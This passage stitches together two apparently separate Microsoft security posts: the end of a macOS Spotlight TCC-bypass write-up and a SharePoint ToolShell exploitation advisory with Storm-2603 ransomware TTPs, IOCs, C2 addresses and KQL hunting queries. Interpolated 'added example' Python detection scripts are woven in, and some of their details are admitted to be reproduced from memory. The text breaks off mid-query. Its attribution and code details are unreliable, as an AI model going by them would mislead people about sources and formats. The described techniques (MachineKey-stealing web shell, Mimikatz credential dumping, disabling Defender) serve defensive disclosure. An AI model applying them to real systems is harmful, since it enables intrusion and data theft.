Figure 4. Exploitation – note the Terminal does not have access to Photos but files are still discovered and leaked
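From the defender's side, the properties the bypass relies on (an unsigned bundle dropped into the user-writable ~/Library/Spotlight directory and declaring catch-all or dynamic UTIs) are exactly what an audit of loaded importers should look for. The following added example (not Apple's, Microsoft's or the proof-of-concept's code) performs that audit; the mdimport -L output layout is reproduced from memory, and the sample bundles, their Info.plist contents and the signed flags are constructed (in real use the flag would come from codesign verification).

```python
"""Added example: audit the Spotlight importers a host loads, from a defender's side.
Not Apple's, Microsoft's or the PoC's code. Assumptions: the ``mdimport -L`` output
layout (quoted bundle paths inside an array listing) is reproduced from memory; the
sample bundles, their Info.plist contents and the ``signed`` flags are constructed
(in real use the flag would come from codesign verification)."""
import plistlib
import re

USER_SPOTLIGHT_RE = re.compile(r"^/Users/[^/]+/Library/Spotlight/")   # ~/Library/Spotlight
SYSTEM_SPOTLIGHT = "/System/Library/Spotlight/"
BROAD_UTIS = {"public.item", "public.data", "public.content"}   # catch-all types


def parse_mdimport_list(output: str) -> list[str]:
    """Extract .mdimporter bundle paths from an mdimport -L style listing."""
    return re.findall(r'"([^"]+\.mdimporter)"', output)


def declared_utis(info_plist: bytes) -> set[str]:
    """UTIs an importer claims via CFBundleDocumentTypes/LSItemContentTypes."""
    plist = plistlib.loads(info_plist)
    utis: set[str] = set()
    for doc_type in plist.get("CFBundleDocumentTypes", []):
        utis.update(doc_type.get("LSItemContentTypes", []))
    return utis


def assess_importer(path: str, info_plist: bytes, signed: bool) -> list[str]:
    """Reasons an importer deserves review; an empty list means nothing unusual."""
    reasons = []
    if USER_SPOTLIGHT_RE.match(path):
        reasons.append("loaded from user-writable ~/Library/Spotlight")
    if not signed and not path.startswith(SYSTEM_SPOTLIGHT):
        reasons.append("bundle is unsigned")
    utis = declared_utis(info_plist)
    broad = sorted(utis & BROAD_UTIS)
    if broad:
        reasons.append(f"claims catch-all types {broad}")
    dynamic = sorted(u for u in utis if u.startswith("dyn."))
    if dynamic:
        reasons.append(f"claims dynamic types {dynamic}")
    return reasons


def audit_importers(listing: str, bundles: dict[str, tuple[bytes, bool]]) -> dict[str, list[str]]:
    """Map each flagged importer path to its reasons; clean importers are omitted."""
    report = {}
    for path in parse_mdimport_list(listing):
        info_plist, signed = bundles.get(path, (b"", False))
        reasons = assess_importer(path, info_plist, signed) if info_plist else ["no Info.plist available"]
        if reasons:
            report[path] = reasons
    return report


def _plist(utis: list[str]) -> bytes:
    """Build a minimal importer Info.plist (constructed test data)."""
    return plistlib.dumps({"CFBundleDocumentTypes": [{"LSItemContentTypes": utis}]})


# Constructed listing and bundle metadata; the third bundle mimics the technique above.
SAMPLE_LISTING = """Paths: id(501) (
    "/System/Library/Spotlight/RichText.mdimporter",
    "/Library/Spotlight/Example Mail.mdimporter",
    "/Users/alice/Library/Spotlight/Photo Helper.mdimporter"
)"""
SAMPLE_BUNDLES = {
    "/System/Library/Spotlight/RichText.mdimporter": (_plist(["public.rtf"]), True),
    "/Library/Spotlight/Example Mail.mdimporter": (_plist(["com.example.mail-message"]), True),
    "/Users/alice/Library/Spotlight/Photo Helper.mdimporter":
        (_plist(["public.data", "dyn.ah62d4rv4ge81e3dtqq"]), False),
}

if __name__ == "__main__":
    for path, reasons in audit_importers(SAMPLE_LISTING, SAMPLE_BUNDLES).items():
        print(path, "->", "; ".join(reasons))
```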
Exposing more sensitive data from Apple Intelligence
The ability to read sensitive files is more dangerous than it seems. As it turns out, the recently introduced Apple Intelligence (which is installed by default on all ARM-based devices) caches its data under various directories. For example, one such directory lives under the user's Pictures directory:
Figure 5. Index files created by Apple Intelligence
Access to those files is protected by the “Pictures” TCC service type and cannot be accessed without a user’s approval. However, as we previously demonstrated with the Sploitlight POC, we can leak arbitrary files’ contents and thus extract the contents of those database files.
There are many great utilities for extracting private information from Photos.sqlite and photos.db, but we’d like to summarize what information attackers would be able to obtain:
Type of data | Information obtained
--- | ---
Precise geolocation data | GPS coordinates (latitude, longitude, altitude) associated with photos and videos; time-stamped location history, potentially reconstructing a user's movements over time; reverse-geocoded addresses or place names.
Photo and video metadata | Timestamps of when photos and videos were taken; device model and camera settings (aperture, ISO, shutter speed); media paths pointing to stored content.
Face and person recognition data | Identified faces, sometimes linked to contact names if tagged; clustering of photos by recognized individuals.
User activity and event context | Photo-related activities, such as screenshots, saved images, and shared content; event clustering (such as vacations, birthdays).
Photo albums and shared libraries | User-defined photo albums and their contents; shared album details, including participants.
Deleted photos and videos | Metadata of recently deleted items that may still exist in the Recently Deleted section.
Image classification and object detection | Labels and categories generated by the Photos app (such as "beach," "dog," "document").
Search history and user preferences | Previous search queries within the Photos app.
Figure 6. Getting file name, description, title, GPS location, and date from Photos.sqlite metadata
Alongside those implications of an attacker gaining such detailed private information on a targeted user’s device, it’s important to remember that Apple devices that share the same iCloud account will have different Photos.sqlite database files, but face tagging and other metadata propagates between devices. This means that an attacker with access to a user’s macOS device would also be able to determine remote information of other devices linked to that user’s iCloud account, such as data from the target user’s iPhone.
Strengthening protection against TCC bypass attacks
Attackers with the ability to bypass TCC protections on macOS devices can access sensitive data without user consent. The ability to further exfiltrate private data from protected directories, such as the Downloads folder and Apple Intelligence caches, is particularly alarming due to the highly sensitive nature of the information that can be extracted, including geolocation data, media metadata, and user activities. The implications of this vulnerability are even more extensive given the remote linking capability between devices using the same iCloud account, enabling attackers to determine more remote information about a user through their linked devices. Understanding the implications of TCC bypass vulnerabilities is essential for building proactive defenses that safeguard user data from unauthorized access.
By comprehending the broader impacts of these security concerns, we can better defend users and ensure their digital safety. Microsoft Defender for Endpoint allows organizations to quickly discover and remediate vulnerabilities such as Sploitlight in their increasingly heterogeneous networks. The insights gained from this research have enabled us to enhance Microsoft Defender for Endpoint’s detection mechanisms, providing robust protection against unauthorized access to private data by proactively detecting anomalous .mdimporter bundle installations, alongside any suspicious index of sensitive directories:
Figure 7. Microsoft Defender for Endpoint detection of unusual Spotlight operations
By continuously improving our security solutions, we aim to safeguard user information and uphold the trust placed in our products. Moreover, this research emphasizes the importance of continuous vigilance and collaboration with software vendors and the security community to identify and mitigate such vulnerabilities before they can be exploited. We would like to again thank the Apple security team for their collaboration in fixing CVE-2025-31199.
We encourage users to ensure they have applied the security updates released by Apple to mitigate this issue.
As cross-platform threats become more prevalent, Microsoft remains vigilant in monitoring the threat landscape to discover new vulnerabilities and attacker techniques affecting macOS and other non-Windows devices. Our proactive approach to vulnerability discoveries and threat intelligence sharing enhances protection technologies, ensuring that users can enjoy a secure computing experience safeguarded from threats, regardless of the platform or device they use.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
July 23, 2025 update – Expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603 leading to the deployment of Warlock ransomware. Based on new information, we have updated the Attribution, Indicators of compromise, extended and clarified Mitigation and protection guidance (including raising Step 6: Restart IIS for emphasis), Detections, and Hunting sections.
On July 19, 2025, Microsoft Security Response Center (MSRC) published a blog addressing active attacks against on-premises SharePoint servers that exploit CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability. These vulnerabilities affect on-premises SharePoint servers only and do not affect SharePoint Online in Microsoft 365. Microsoft has released new comprehensive security updates for all supported versions of SharePoint Server (Subscription Edition, 2019, and 2016) that protect customers against these new vulnerabilities. Customers should apply these updates immediately to ensure they are protected.
These comprehensive security updates address newly disclosed security vulnerabilities in CVE-2025-53770 that are related to the previously disclosed vulnerability CVE-2025-49704. The updates also address the security bypass vulnerability CVE-2025-53771 for the previously disclosed CVE-2025-49706.
As of this writing, Microsoft has observed two named Chinese nation-state actors, Linen Typhoon and Violet Typhoon, exploiting these vulnerabilities against internet-facing SharePoint servers. In addition, we have observed another China-based threat actor, tracked as Storm-2603, exploiting these vulnerabilities to deploy ransomware. Investigations into other actors also using these exploits are still ongoing. Given the rapid adoption of these exploits, Microsoft assesses with high confidence that threat actors will continue to integrate them into their attacks against unpatched on-premises SharePoint systems. This blog shares details of observed exploitation of CVE-2025-49706 and CVE-2025-49704 and the follow-on tactics, techniques, and procedures (TTPs) used by threat actors. We will update this blog with more information as our investigation continues.
Microsoft recommends that customers use supported versions of on-premises SharePoint Server with the latest security updates. To stop unauthenticated attacks from exploiting this vulnerability, customers should also integrate and enable the Antimalware Scan Interface (AMSI) and Microsoft Defender Antivirus (or equivalent solutions) for all on-premises SharePoint deployments and configure AMSI in Full Mode, as detailed in the Mitigations section below. Customers should also rotate SharePoint server ASP.NET machine keys, restart Internet Information Services (IIS), and deploy Microsoft Defender for Endpoint or an equivalent solution.
Microsoft observed multiple threat actors conducting reconnaissance and attempting exploitation of on-premises SharePoint servers through a POST request to the ToolPane endpoint.
Figure 1. POST request to ToolPane endpoint
Post-exploitation activities
Threat actors who successfully executed the authentication bypass and remote code execution exploits against vulnerable on-premises SharePoint servers have been observed using a web shell in their post-exploitation payload.
Web shell deployment
In observed attacks, threat actors send a crafted POST request to the SharePoint server, uploading a malicious script named spinstall0.aspx. Actors have also modified the file name in a variety of ways, such as spinstall.aspx, spinstall1.aspx, spinstall2.aspx, etc. The spinstall0.aspx script contains commands to retrieve MachineKey data and return the results to the user through a GET request, enabling the theft of the key material by threat actors.
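One way to hunt for this request sequence in IIS W3C request logs, as an added example that is not Microsoft's code or one of the blog's queries: it assumes the standard W3C field set, that the ToolPane endpoint is served as /_layouts/15/ToolPane.aspx, and uses constructed sample log lines.

```python
"""Hunt IIS W3C request logs for the ToolShell request pattern described above.

Added example, not Microsoft's code or a query from the blog. It flags:
  1. POST requests to the SharePoint ToolPane endpoint (the exploit entry point)
  2. requests for files under /_layouts/ whose names match the web shell names
     from the blog's hunting queries (spinstall0.aspx and its variants)
The log lines are constructed; the client addresses are documentation ranges,
not indicators from the blog.
"""
from dataclasses import dataclass
from typing import Iterable, Iterator, List, Optional

# Name fragments from the blog's DeviceFileEvents query, lower-cased for matching.
WEBSHELL_NAME_FRAGMENTS = ("spinstall", "spupdate", "splogoutlayout",
                           "sp.ui.titleview", "queryruleaddtool", "clientid")


@dataclass
class Finding:
    when: str
    client_ip: str
    user: str
    method: str
    uri: str
    status: str
    reason: str


def parse_w3c(lines: Iterable[str]) -> Iterator[dict]:
    """Yield one dict per request, using the #Fields directive for column names."""
    fields: Optional[List[str]] = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("no #Fields directive before first log entry")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed entry; skip rather than misalign columns
        yield dict(zip(fields, values))


def classify(row: dict) -> Optional[str]:
    """Return a reason string if the request matches the ToolShell pattern."""
    stem = row["cs-uri-stem"].lower()
    if row["cs-method"].upper() == "POST" and stem.endswith("/toolpane.aspx"):
        # Authenticated page editing also POSTs here; an anonymous client
        # ("-" in cs-username) is the unauthenticated case the blog describes.
        who = "anonymous client" if row["cs-username"] == "-" else "authenticated user"
        return f"POST to ToolPane endpoint by {who}"
    if "/_layouts/" in stem:
        name = stem.rsplit("/", 1)[-1]
        if any(fragment in name for fragment in WEBSHELL_NAME_FRAGMENTS):
            return f"request for suspected web shell {name}"
    return None


def hunt(lines: Iterable[str]) -> List[Finding]:
    """Run classify() over every parsed request and collect the matches."""
    findings = []
    for row in parse_w3c(lines):
        reason = classify(row)
        if reason:
            findings.append(Finding(
                when=f'{row["date"]} {row["time"]}',
                client_ip=row["c-ip"], user=row["cs-username"],
                method=row["cs-method"], uri=row["cs-uri-stem"],
                status=row["sc-status"], reason=reason))
    return findings


# Constructed sample log (not from the blog). Two benign requests by a signed-in
# user, then the exploit-style POST and the follow-up GET for the dropped file.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-18 09:12:44 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\jdoe 198.51.100.7 Mozilla/5.0 - 200 0 0 120
2025-07-18 09:13:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200 0 0 380
2025-07-18 09:13:05 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200 0 0 45
2025-07-18 09:14:10 10.0.0.5 POST /_vti_bin/client.svc/ProcessQuery - 443 CONTOSO\jdoe 198.51.100.7 Mozilla/5.0 - 200 0 0 90
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"{f.when} {f.client_ip} {f.method} {f.uri} {f.status}: {f.reason}")
```

An anonymous POST to ToolPane followed within seconds by a GET for a LAYOUTS file from the same client is the sequence worth prioritising; a POST alone also occurs during legitimate page editing.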
Related IOCs and hunting queries
Microsoft provides indicators of compromise (IOCs) to identify and hunt for this web shell in the Indicators of compromise section of this blog. Microsoft provides related hunting queries to find this dropped file in the Hunting queries section of this blog.
Attribution
As early as July 7, 2025, Microsoft analysis suggests threat actors were attempting to exploit CVE-2025-49706 and CVE-2025-49704 to gain initial access to target organizations. These actors include Chinese state actors Linen Typhoon and Violet Typhoon and another China-based actor Storm-2603. The TTPs employed in these exploit attacks align with previously observed activities of these threat actors.
Linen Typhoon
Since 2012, Linen Typhoon has focused on stealing intellectual property, primarily targeting organizations related to government, defense, strategic planning, and human rights. This threat actor is known for using drive-by compromises and historically has relied on existing exploits to compromise organizations.
Violet Typhoon
Since 2015, the Violet Typhoon activity group has been dedicated to espionage, primarily targeting former government and military personnel, non-governmental organizations (NGOs), think tanks, higher education, digital and print media, financial and health related sectors in the United States, Europe, and East Asia. This group persistently scans for vulnerabilities in the exposed web infrastructure of target organizations, exploiting discovered weaknesses to install web shells.
Storm-2603
The group that Microsoft tracks as Storm-2603 is assessed with moderate confidence to be a China-based threat actor. Microsoft has not identified links between Storm-2603 and other known Chinese threat actors. Microsoft tracks this threat actor in association with attempts to steal MachineKeys using the on-premises SharePoint vulnerabilities. Although Microsoft has observed this threat actor deploying Warlock and Lockbit ransomware in the past, Microsoft is currently unable to confidently assess the threat actor’s objectives. Starting on July 18, 2025, Microsoft has observed Storm-2603 deploying ransomware using these vulnerabilities.
Initial access and delivery
The observed attack begins with the exploitation of an internet-facing on-premises SharePoint server, granting Storm-2603 initial access to the environment using the spinstall0.aspx payload described earlier in this blog. This initial access is used to conduct command execution using the w3wp.exe process that supports SharePoint. Storm-2603 then initiates a series of discovery commands, including whoami, to enumerate user context and validate privilege levels. The use of cmd.exe and batch scripts is also observed as the actor transitions into broader execution phases. Notably, services.exe is abused to disable Microsoft Defender protections through direct registry modifications.
Persistence
Storm-2603 established persistence through multiple mechanisms. In addition to the spinstall0.aspx web shell, the threat actor also creates scheduled tasks and manipulates Internet Information Services (IIS) components to load suspicious .NET assemblies. These actions ensure continued access even if initial vectors are remediated.
Action on objectives
The threat actor performs credential access using Mimikatz, specifically targeting the Local Security Authority Subsystem Service (LSASS) memory to extract plaintext credentials. The actor moves laterally using PsExec and the Impacket toolkit, executing commands using Windows Management Instrumentation (WMI).
Storm-2603 is then observed modifying Group Policy Objects (GPO) to distribute Warlock ransomware in compromised environments.
Figure 2. Storm-2603 attack chain exploiting SharePoint vulnerabilities and leading to ransomware
Additional actors will continue to use these exploits to target unpatched on-premises SharePoint systems, further emphasizing the need for organizations to implement mitigations and security updates immediately.
Mitigation and protection guidance
Microsoft has released security updates that fully protect customers using all supported versions of SharePoint affected by CVE-2025-53770 and CVE-2025-53771. Customers should apply these updates immediately.
Customers using SharePoint Server should follow the guidance below.
Use or upgrade to supported versions of on-premises Microsoft SharePoint Server.
Supported versions: SharePoint Server 2016, 2019, and SharePoint Subscription Edition
Configure Antimalware Scan Interface (AMSI) integration in SharePoint, enable Full Mode for optimal protection, and deploy Defender Antivirus on all SharePoint servers, which will stop unauthenticated attackers from exploiting this vulnerability.
Note: AMSI integration was enabled by default in the September 2023 security update for SharePoint Server 2016/2019 and the Version 23H2 feature update for SharePoint Server Subscription Edition.
If you cannot enable AMSI, we recommend you consider disconnecting your server from the internet until you have applied the most current security update linked above. If the server cannot be disconnected from the internet, consider using a VPN or proxy requiring authentication or an authentication gateway to limit unauthenticated traffic.
Deploy Microsoft Defender for Endpoint, or equivalent solutions
We recommend that organizations deploy Defender for Endpoint to detect and block post-exploit activity.
Rotate SharePoint Server ASP.NET machine keys
After applying the latest security updates above or enabling AMSI, it is critical that customers rotate SharePoint server ASP.NET machine keys and restart Internet Information Services (IIS) on all SharePoint servers.
Manually using Central Admin: Trigger the Machine Key Rotation timer job by performing the following steps:
Navigate to the Central Administration site.
Go to Monitoring -> Review job definition.
Search for Machine Key Rotation Job and select Run Now.
Restart IIS on all SharePoint servers using iisreset.exe. NOTE: If you cannot enable AMSI, you will need to rotate your keys and restart IIS after you install the new security update.
Implement your incident response plan.
To protect against post-exploitation activity, including ransomware deployment, Microsoft recommends the following mitigations:
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
Read our human-operated ransomware blog for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint – or equivalent EDR solution – can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure automatic attack disruption in Microsoft Defender XDR. Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization’s assets, and provide more time for security teams to remediate the attack fully.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques. Attack surface reduction rules are sweeping settings that stop entire classes of threats. The following bullet points offer more guidance on specific mitigation advice:
Indicator | Type | Description
spinstall0.aspx | File name | Web shell used by threat actors. Actors have also modified the file name in a variety of ways, such as spinstall.aspx, spinstall1.aspx, spinstall2.aspx
IIS_Server_dll.dll | File name | Storm-2603 IIS backdoor
SharpHostInfo.x64.exe | File name | Pentest tool observed during attack that is used to collect host information using NetBIOS, SMB, and WMI
xd.exe | File name | Fast reverse proxy tool used to connect to C2 IP 65.38.121[.]198
debug_dev.js | File name | File containing web config data, including MachineKey data
Microsoft Defender XDR customers get coordinated protection across endpoints, identities, email, and cloud apps to detect, prevent, investigate, and respond to threats like the SharePoint exploitation activity described in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
The following table outlines the tactics observed in the exploitation attacks discussed in this blog, along with Microsoft Defender protection coverage at each stage of the attack chain:
Tactic | Observed activity | Microsoft Defender coverage
Initial Access | Use of known vulnerabilities to exploit internet-facing SharePoint servers | Microsoft Defender Antivirus: Exploit:Script/SuspSignoutReq.A; Exploit:Script/SuspSignoutReqBody.A. Microsoft Defender for Endpoint: ‘SuspSignoutReq’ malware was blocked on a SharePoint server; Possible exploitation of SharePoint server vulnerabilities
Execution | Use of a web shell to run PowerShell and exfiltrate sensitive data (e.g., MachineKey); Batch scripts and cmd.exe to launch PsExec for remote execution; Attempts to disable Microsoft Defender protections through registry edits using the service control manager; Escalation of privileges to SYSTEM using PsExec with the -s flag; Use of Impacket to execute commands remotely over WMI without writing files to disk | Microsoft Defender Antivirus: Trojan:Win32/HijackSharePointServer.A. Microsoft Defender for Endpoint: Suspicious IIS worker process behavior; Suspicious scheduled task; Impacket toolkit
Persistence | Installation of web shell after exploiting SharePoint vulnerability; IIS worker process loaded suspicious .NET assembly; Scheduled task for persistence following initial access | Microsoft Defender Antivirus: Trojan:PowerShell/MachineKeyFinder.DA!amsi. Microsoft Defender for Endpoint: Possible web shell installation; IIS worker process loaded suspicious .NET assembly
Credential Access | Mimikatz used to run module “sekurlsa::logonpasswords”, which lists all available credentials | Microsoft Defender for Endpoint: Mimikatz credential theft tool
Lateral Movement | Impacket is observed leveraging Windows Management Instrumentation to remotely stage and execute payloads | Microsoft Defender for Endpoint: A remote resource was accessed suspiciously; Compromised account conducting hands-on-keyboard attack; Ongoing hands-on-keyboard attack via Impacket toolkit
Collection | Web shell used to extract MachineKey data | Microsoft Defender Antivirus: Trojan:PowerShell/MachineKeyFinder.DA!amsi. Microsoft Defender for Endpoint: Possible web shell installation
Impact | Files encrypted in compromised environments as part of ransomware attack | Microsoft Defender for Endpoint: Ransomware-linked threat actor detected; Potentially compromised assets exhibiting ransomware-like behavior; Ransomware behavior detected in the file system; Possible compromised user account delivering ransomware-related file; Potential human-operated malicious activity
Note: These alerts can also be triggered by unrelated threat activity.
Vulnerability management
Customers using Microsoft Defender Vulnerability Management can identify exposed devices and track remediation efforts based on the following CVEs:
CVE-2025-53770 – SharePoint ToolShell Auth Bypass and RCE
Navigate to Vulnerability management > Weaknesses and filter by these CVE IDs to view exposed devices, remediation status, and Evidence of Exploitation tags.
You can also use this unified advanced hunting query:
DeviceTvmSoftwareVulnerabilities
| where CveId in (
"CVE-2025-49704",
"CVE-2025-49706",
"CVE-2025-53770",
"CVE-2025-53771")
Microsoft Defender External Attack Surface Management (Defender EASM) provides visibility into exposed internet-facing SharePoint instances. The following Attack Surface Insights may indicate vulnerable but not necessarily exploited services:
CVE-2025-49704 – SharePoint RCE
CVE-2025-53770 – SharePoint ToolShell Auth Bypass and RCE
Note: A “Potential” insight signals that a service is detected but version validation is not possible. Customers should manually verify patching status.
Hunting queries
Microsoft Defender XDR
To locate possible exploitation activity, run the following queries in Microsoft Defender XDR security center.
Successful exploitation using file creation
Look for the creation of spinstall0.aspx, which indicates successful post-exploitation of CVE-2025-53770.
DeviceFileEvents
| where FolderPath has_any ("microsoft shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS", "microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS")
| where FileName contains "spinstall" or FileName contains "spupdate" or FileName contains "SpLogoutLayout" or FileName contains "SP.UI.TitleView"
or FileName contains "queryruleaddtool" or FileName contains "ClientId"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, FolderPath, ReportId, ActionType, SHA256
| order by Timestamp desc
Post-exploitation PowerShell dropping web shell
Look for process creation where w3wp.exe is spawning encoded PowerShell involving the spinstall0.aspx file or the file paths it’s been known to be written to.
DeviceProcessEvents
| where InitiatingProcessFileName has "w3wp.exe"
and InitiatingProcessCommandLine !has "DefaultAppPool"
and FileName =~ "cmd.exe"
and ProcessCommandLine has_all ("cmd.exe", "powershell")
and ProcessCommandLine has_any ("EncodedCommand", "-ec")
| extend CommandArguments = split(ProcessCommandLine, " ")
| mv-expand CommandArguments to typeof(string)
| where CommandArguments matches regex "^[A-Za-z0-9+/=]{15,}$"
| extend B64Decode = replace("\\x00", "", base64_decodestring(tostring(CommandArguments)))
| where B64Decode contains "spinstall" or B64Decode contains "spupdate" or B64Decode contains "SpLogoutLayout" or B64Decode contains "SP.UI.TitleView"
or B64Decode contains "queryruleaddtool" or B64Decode contains "ClientId" and B64Decode contains
@'C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\15\TEMPLATE\LAYOUTS' or B64Decode contains @'C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS'
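The same decode-then-match logic as the query above, written in Python as an added example (not Microsoft's code) over constructed process-creation events; it assumes each event carries the initiating process name and the full command line, and it builds its sample encoded command at runtime so no payload is hard-coded.

```python
"""Decode PowerShell -EncodedCommand arguments and check the plaintext for the
web shell indicators used in the hunting query above.

Added example, not Microsoft's code. PowerShell expects the script as base64 over
UTF-16LE, which is why the KQL deletes "\x00" bytes after base64_decodestring;
here the bytes are decoded as UTF-16LE directly. All events are constructed.
"""
import base64
import binascii
import re
from typing import List, Tuple

# Indicators taken from the query above, lower-cased because KQL `contains`
# is case-insensitive.
WEBSHELL_NAMES = ("spinstall", "spupdate", "splogoutlayout", "sp.ui.titleview",
                  "queryruleaddtool", "clientid")
LAYOUTS_PATHS = (r"c:\progra~1\common~1\micros~1\webser~1\15\template\layouts",
                 r"c:\progra~1\common~1\micros~1\webser~1\16\template\layouts")

# PowerShell accepts -e, -ec and -enc as abbreviations of -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/=]{15,}$")  # same token filter as the KQL


def decode_encoded_commands(cmdline: str) -> List[str]:
    """Return the plaintext of every encoded-command payload in a command line."""
    if not ENCODED_FLAG.search(cmdline):
        return []
    scripts = []
    for token in cmdline.split(" "):
        if not B64_TOKEN.match(token):
            continue
        try:
            scripts.append(base64.b64decode(token, validate=True).decode("utf-16-le"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # looked like base64 but is not a UTF-16LE script
    return scripts


def webshell_indicators(script: str) -> List[str]:
    """Indicators from the query that appear in a decoded script."""
    lowered = script.lower()
    return ([n for n in WEBSHELL_NAMES if n in lowered]
            + [p for p in LAYOUTS_PATHS if p in lowered])


def find_webshell_drops(events) -> List[Tuple[str, str, List[str]]]:
    """events: iterable of (initiating_process_name, command_line) tuples."""
    findings = []
    for parent, cmdline in events:
        if parent.lower() != "w3wp.exe":  # only PowerShell spawned by the IIS worker
            continue
        for script in decode_encoded_commands(cmdline):
            hits = webshell_indicators(script)
            if hits:
                findings.append((cmdline, script, hits))
    return findings


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not telemetry from the blog). The file content in
# the sample script is a placeholder string, not web shell code.
SAMPLE_SCRIPT = (r"Set-Content -Path 'C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\15"
                 r"\TEMPLATE\LAYOUTS\spinstall0.aspx' -Value '<placeholder>'")
SAMPLE_EVENTS = [
    ("w3wp.exe", "cmd.exe /c powershell -EncodedCommand " + encode_command(SAMPLE_SCRIPT)),
    ("w3wp.exe", "cmd.exe /c powershell -ec " + encode_command("Get-Date")),
    ("explorer.exe", "cmd.exe /c powershell -enc " + encode_command(SAMPLE_SCRIPT)),
]

if __name__ == "__main__":
    for cmdline, script, hits in find_webshell_drops(SAMPLE_EVENTS):
        print("HIT", hits, "<-", script)
```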
Post-exploitation web shell dropped
Look for the web shell dropped using the PowerShell command.
DeviceFileEvents
| where Timestamp >ago(7d)
| where InitiatingProcessFileName=~"powershell.exe"
| where FileName contains "spinstall" or FileName contains "spupdate" or FileName contains "SpLogoutLayout" or FileName contains "SP.UI.TitleView"
or FileName contains "queryruleaddtool" or FileName contains "ClientId"
Exploitation detected by Defender
Look at Microsoft Defender for Endpoint telemetry to determine if specific alerts fired in your environment.
AlertEvidence
| where Timestamp > ago(7d)
| where Title has "SuspSignoutReq"
| extend _DeviceKey = iff(isnotempty(DeviceId), bag_pack_columns(DeviceId, DeviceName),"")
| summarize min(Timestamp), max(Timestamp), count_distinctif(DeviceId,isnotempty(DeviceId)), make_set(Title), make_set_if(_DeviceKey, isnotempty(_DeviceKey) )
Unified advanced hunting queries
Find exposed devices
Look for devices vulnerable to the CVEs listed in this blog.
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-49704","CVE-2025-49706","CVE-2025-53770","CVE-2025-53771")
Web shell C2 communication
Find devices that may have communicated with Storm-2603 web shell C2 infrastructure, which may indicate a compromised device beaconing to Storm-2603-controlled infrastructure.
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Detect network indicators of compromise and file hashes using ASIM
//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["131.226.2.6", "134.199.202.205", "104.238.159.149", "188.130.206.168"]);
let ioc_domains = dynamic(["c34718cbb4c6.ngrok-free.app"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["131.226.2.6", "134.199.202.205", "104.238.159.149", "188.130.206.168"]);
let ioc_sha_hashes =dynamic(["92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
// file hash list - imFileEvent
let ioc_sha_hashes = dynamic(["92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514"]);
imFileEvent
| where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'\')[1]),
AccountNTDomain = tostring(split(User, @'\')[0])
| extend AlgorithmType = "SHA256"
Post exploitation C2 or file hashes
Find devices that may have communicated with Storm-2603 post exploitation C2 or contain known Storm-2603 file hashes.
//IP list - _Im_WebSession
let lookback = 30d;
